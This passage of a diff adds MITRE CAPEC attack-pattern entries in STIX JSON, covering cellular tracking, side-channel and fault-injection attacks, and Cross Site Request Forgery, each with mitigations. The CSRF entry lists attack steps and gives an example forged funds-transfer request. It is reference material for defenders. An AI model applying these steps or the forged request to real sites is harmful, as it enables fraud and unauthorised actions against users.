"attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Intercept and control cellular data communications to/from mobile device.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_skills_required": { + "Low": "This technique has been demonstrated by amateur hackers and commercial tools and open source projects are available to automate the attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Passively monitor cellular network connection for real-time threat detection and logging for manual review.", + "id": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-617-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c58917b8-55ad-4997-bfa1-356553087aa1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b183808c-b043-46e6-a10a-acb7644ea511", + "spec_version": "2.1", + "target_ref": "attack-pattern--fff5e678-9e98-4e12-b054-119ff429e214", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker uses knowledge of the target’s mobile phone number (i.e., the number associated with the SIM used in the retransmission device) to cause the cellular network to send broadcast messages to alert the mobile device. Since the network knows which cell tower the target’s mobile device is attached to, the broadcast messages are only sent in the Location Area Code (LAC) where the target is currently located. By triggering the cellular broadcast message and then listening for the presence or absence of that message, an attacker could verify that the target is in (or not in) a given location.", + "external_references": [ + { + "external_id": "CAPEC-618", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/618.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + }, + { + "description": "Denis Foo Kune, John Koelndorfer, Nicholas Hopper, Yongdae Kim, Location Leaks on the GSM Air Interface, University of Minnesota", + "external_id": "REF-487", + "source_name": "reference_from_CAPEC", + "url": "https://www-users.cs.umn.edu/~hoppernj/celluloc.pdf" + } + ], + "id": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Cellular Broadcast Message Request", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_consequences": { + "Other": [ + "Other (An attacker could verify that the target is in (or not in) a given location.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_prerequisites": [ + "The attacker must have knowledge of the target’s mobile phone number." + ], + "x_capec_skills_required": { + "Low": "Open source and commercial tools are available for this attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Frequent changing of mobile number.", + "id": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-618-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--79aff368-471d-46f4-803b-6584f3497601", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--272a376e-ec84-4fcd-abb5-00cba0e3c7e0", + "spec_version": "2.1", + "target_ref": "attack-pattern--3b775ca7-4c1d-4078-bc7b-29907b9596f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors the signal strength of the target’s cellular RF signal or WiFi RF signal and uses the strength of the signal (with directional antennas and/or from multiple listening points at once) to identify the source location of the signal. Obtaining the signal of the target can be accomplished through multiple techniques such as through Cellular Broadcast Message Request or through the use of IMSI Tracking or WiFi MAC Address Tracking.", + "external_references": [ + { + "external_id": "CAPEC-619", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/619.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--d900a0ea-7dd6-4ed8-a1bf-ac498e68d9e5", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Signal Strength Tracking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--d780db94-413f-402d-a4d9-cf179b316c8c" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_skills_required": { + "Low": "Commercial tools are available." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker crafts malicious web links and distributes them (via web pages, email, etc.), typically in a targeted manner, hoping to induce users to click on the link and execute the malicious action against some third-party application. If successful, the action embedded in the malicious link will be processed and accepted by the targeted application with the users' privilege level. This type of attack leverages the persistence and implicit trust placed in user session cookies by many web applications today. In such an architecture, once the user authenticates to an application and a session cookie is created on the user's system, all following transactions for that session are authenticated using that cookie including potential actions initiated by an attacker and simply \"riding\" the existing session cookie.", + "external_references": [ + { + "external_id": "CAPEC-62", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/62.html" + }, + { + "external_id": "CWE-352", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/352.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-664", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/664.html" + }, + { + "external_id": "CWE-732", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/732.html" + }, + { + "external_id": "CWE-1275", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1275.html" + }, + { + "description": "Cross-Site Request Forgery", + "external_id": "09", + "source_name": "WASC", + "url": "http://projects.webappsec.org/Cross-Site-Request-Forgery" + }, + { + "description": "Cross Site Request Forgery (CSRF)", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/csrf" + }, + { + "description": "Thomas Schreiber, Session Riding: A Widespread Vulnerability in Today's Web Applications, SecureNet GmbH", + "external_id": "REF-62", + "source_name": "reference_from_CAPEC", + "url": "https://crypto.stanford.edu/cs155old/cs155-spring08/papers/Session_Riding.pdf" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-602", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/06-Session_Management_Testing/05-Testing_for_Cross_Site_Request_Forgery.html" + } + ], + "id": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Cross Site Request Forgery", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_alternate_terms": [ + "Session Riding" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2351ee64-dd85-4bc3-bb43-aaa2ca5c1228" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges", + "Read Data" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n While a user is logged into their bank account, an attacker can send an email with some potentially interesting content and require the user to click on a link in the email.\n The link points to or contains an attacker setup script, probably even within an iFrame, that mimics an actual user form submission to perform a malicious activity, such as transferring funds from the victim's account.\n The attacker can have the script embedded in, or targeted by, the link perform any arbitrary action as the authenticated user. When this script is executed, the targeted application authenticates and accepts the actions based on the victims existing session cookie.See also: Cross-site request forgery (CSRF) vulnerability in util.pl in @Mail WebMail 4.51 allows remote attackers to modify arbitrary settings and perform unauthorized actions as an arbitrary user, as demonstrated using a settings action in the SRC attribute of an IMG element in an HTML e-mail." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Explore target website: The attacker first explores the target website to determine pieces of functionality that are of interest to them (e.g. money transfers). The attacker will need a legitimate user account on the target website. It would help to have two accounts.

    2. Techniques
    Use web application debugging tool such as WebScarab, Tamper Data or TamperIE to analyze the information exchanged between the client and the server
    Use network sniffing tool such as Wireshark to analyze the information exchanged between the client and the server
    View HTML source of web pages that contain links or buttons that perform actions of interest.

Experiment

  1. Create a link that when clicked on, will execute the interesting functionality.: The attacker needs to create a link that will execute some interesting functionality such as transfer money, change a password, etc.

    2. Techniques
    Create a GET request containing all required parameters (e.g. https://www.somebank.com/members/transfer.asp?to=012345678901&amt=10000)
    Create a form that will submit a POST request (e.g.

Exploit

  1. Convince user to click on link: Finally, the attacker needs to convince a user that is logged into the target website to click on a link to execute the CSRF attack.

    2. Techniques
    Execute a phishing attack and send the user an e-mail convincing them to click on a link.
    Execute a stored XSS attack on a website to permanently embed the malicious link into the website.
    Execute a stored XSS attack on a website where an XMLHTTPRequest object will automatically execute the attack as soon as a user visits the page. This removes the step of convincing a user to click on a link.
    Include the malicious link on the attackers' own website where the user may have to click on the link, or where an XMLHTTPRequest object may automatically execute the attack when a user visits the site.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--c50d5a35-0010-422d-b6f7-d4b963c9bad4" + ], + "x_capec_resources_required": [ + "All the attacker needs is the exact representation of requests to be made to the application and to be able to get the malicious link across to a victim." + ], + "x_capec_skills_required": { + "Medium": "The attacker needs to figure out the exact invocation of the targeted malicious action and then craft a link that performs the said action. Having the user click on such a link is often accomplished by sending an email or posting such a link to a bulletin board or the likes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Use cryptographic tokens to associate a request with a specific action. The token can be regenerated at every request so that if a request with an invalid token is encountered, it can be reliably discarded. The token is considered invalid if it arrived with a request other than the action it was supposed to be associated with.", + "id": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--05c63f5d-bdef-4967-b173-43a3dc629b9d", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--97c0cee2-43b4-4e35-a822-c2af1fda128d", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Although less reliable, the use of the optional HTTP Referrer header can also be used to determine whether an incoming request was actually one that the user is authorized for, in the current context.", + "id": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3e4e7c46-5802-4623-bfb2-726d5643649a", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--f8e25c6a-17e6-4418-8da8-1a56576657f3", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Additionally, the user can also be prompted to confirm an action every time an action concerning potentially sensitive data is invoked. This way, even if the attacker manages to get the user to click on a malicious link and request the desired action, the user has a chance to recover by denying confirmation. This solution is also implicitly tied to using a second factor of authentication before performing such actions.", + "id": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5334f93e-090e-4dc7-9634-9cf8d617820f", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d48ac0ea-9821-4d1d-b819-78cf36562e97", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In general, every request must be checked for the appropriate authentication token as well as authorization in the current session context.", + "id": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-62-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e911413e-496d-4b6e-afff-88e8e3302abb", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--77756b2a-ad30-4992-acdb-13c8dae467d8", + "spec_version": "2.1", + "target_ref": "attack-pattern--0939f361-ea31-454b-ae3d-4af2411b756d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker forces the encryption level to be lowered, thus enabling a successful attack against the encrypted data.", + "external_references": [ + { + "external_id": "CAPEC-620", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/620.html" + }, + { + "external_id": "CWE-757", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/757.html" + }, + { + "description": "Weaken Encryption", + "external_id": "T1600", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1600" + } + ], + "id": "attack-pattern--e680008c-a642-4feb-a1c4-a29b54eb284a", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Drop Encryption Level", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--c727c058-2c9d-4021-a1ec-81dd030dea59" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--4480b2e7-bdb7-45fe-896b-dd895fbe3680" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker may intercept and log encrypted transmissions for the purpose of analyzing metadata such as packet timing and sizes. Although the actual data may be encrypted, this metadata may reveal valuable information to an attacker. Note that this attack is applicable to VOIP data as well as application data, especially for interactive apps that require precise timing and low-latency (e.g. thin-clients).", + "external_references": [ + { + "external_id": "CAPEC-621", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/621.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Analysis of Packet Timing and Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Use of untrusted communication paths enables an attacker to intercept and log communications, including metadata such as packet timing and sizes." + ], + "x_capec_skills_required": { + "High": "These attacks generally require sophisticated machine learning techniques and require traffic capture as a prerequisite." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Distort packet sizes and timing at VPN layer by adding padding to normalize packet sizes and timing delays to reduce information leakage via timing.", + "id": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-621-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ce899b44-526f-4892-80d2-510f96e94715", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--3d82800d-a207-4cf5-8acb-34298fed624c", + "spec_version": "2.1", + "target_ref": "attack-pattern--1e333aaf-0029-41ab-b164-590851ff2e9a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "In this attack scenario, the attacker passively monitors electromagnetic emanations that are produced by the targeted electronic device as an unintentional side-effect of its processing. From these emanations, the attacker derives information about the data that is being processed (e.g. the attacker can recover cryptographic keys by monitoring emanations associated with cryptographic processing). This style of attack requires proximal access to the device, however attacks have been demonstrated at public conferences that work at distances of up to 10-15 feet. There have not been any significant studies to determine the maximum practical distance for such attacks. Since the attack is passive, it is nearly impossible to detect and the targeted device will continue to operate as normal after a successful attack.", + "external_references": [ + { + "external_id": "CAPEC-622", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/622.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Electromagnetic Side-Channel Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Derive sensitive information about encrypted data. For mobile devices, depending on which keys are compromised, the attacker may be able to decrypt VOIP communications, impersonate the targeted caller, or access the enterprise VPN server.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "Medium": "Sophisticated attack, but detailed techniques published in the open literature." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Utilize side-channel resistant implementations of all crypto algorithms.", + "id": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--518cf128-c5dd-41bf-920c-c59464ae3e89", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e9301ad-e907-414c-9bac-0be1517b0112", + "spec_version": "2.1", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security of all devices that contain secret key information. (even when devices are not in use)", + "id": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-622-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ef792ac3-e23f-463b-8456-e2cb9549a020", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--076b471c-60c6-41a5-9266-e34cc546bfcd", + "spec_version": "2.1", + "target_ref": "attack-pattern--8a2c6c50-26ad-4f1a-a938-25293372f75a", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Compromising Emanations (CE) are defined as unintentional signals which an attacker may intercept and analyze to disclose the information processed by the targeted equipment. Commercial mobile devices and retransmission devices have displays, buttons, microchips, and radios that emit mechanical emissions in the form of sound or vibrations. Capturing these emissions can help an adversary understand what the device is doing.", + "external_references": [ + { + "external_id": "CAPEC-623", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/623.html" + }, + { + "external_id": "CWE-201", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/201.html" + } + ], + "id": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "modified": "2018-07-31T00:00:00.000Z", + "name": "Compromising Emanations Attack", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--4ba540ef-b8ad-4bf7-acac-d8855661c4a2" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (Capture vibrations/emissions from the handset or retransmission device display screen to recreat display information from a distance.)" + ] + }, + "x_capec_domains": [ + "Software", + "Physical Security", + "Hardware" + ], + "x_capec_prerequisites": [ + "Proximal access to the device." + ], + "x_capec_skills_required": { + "High": "Sophisticated attack." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "None are known.", + "id": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "modified": "2018-07-31T00:00:00.000Z", + "name": "coa-623-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2ad7be7d-7b09-4472-bc30-41894c39f568", + "modified": "2018-07-31T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1f959357-f511-4f0e-9b12-51ee99284c2f", + "spec_version": "2.1", + "target_ref": "attack-pattern--3d5bbdf7-b642-43b4-b4be-d9f35923380d", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "The adversary uses disruptive signals or events, or alters the physical environment a device operates in, to cause faulty behavior in electronic devices. This can include electromagnetic pulses, laser pulses, clock glitches, ambient temperature extremes, and more. When performed in a controlled manner on devices performing cryptographic operations, this faulty behavior can be exploited to derive secret key information.", + "external_references": [ + { + "external_id": "CAPEC-624", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/624.html" + }, + { + "external_id": "CWE-1247", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1247.html" + }, + { + "external_id": "CWE-1248", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1248.html" + }, + { + "external_id": "CWE-1256", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1256.html" + }, + { + "external_id": "CWE-1319", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1319.html" + }, + { + "external_id": "CWE-1332", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1332.html" + }, + { + "external_id": "CWE-1334", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1334.html" + }, + { + "external_id": "CWE-1338", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1338.html" + }, + { + "external_id": "CWE-1351", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1351.html" + } + ], + "id": "attack-pattern--965d88fd-a632-4960-b4ba-7521878a0ba3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Hardware Fault Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_alternate_terms": [ + "Side-Channel Attack" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Bypass Protection Mechanism (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)", + "Hide Activities (An adversary capable of successfully collecting and analyzing sensitive, fault/side-channel information, has compromised the confidentiality of that application or information system data.)" + ], + "Integrity": [ + "Execute Unauthorized Commands (If an adversary is able to inject data via a fault or side channel vulnerability towards malicious ends, the integrity of the application or information system will be compromised.)" + ] + }, + "x_capec_domains": [ + "Communications", + "Hardware" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_parent_of_refs": [ + "attack-pattern--48ba5f20-2888-4a0c-8cc6-28631533f255" + 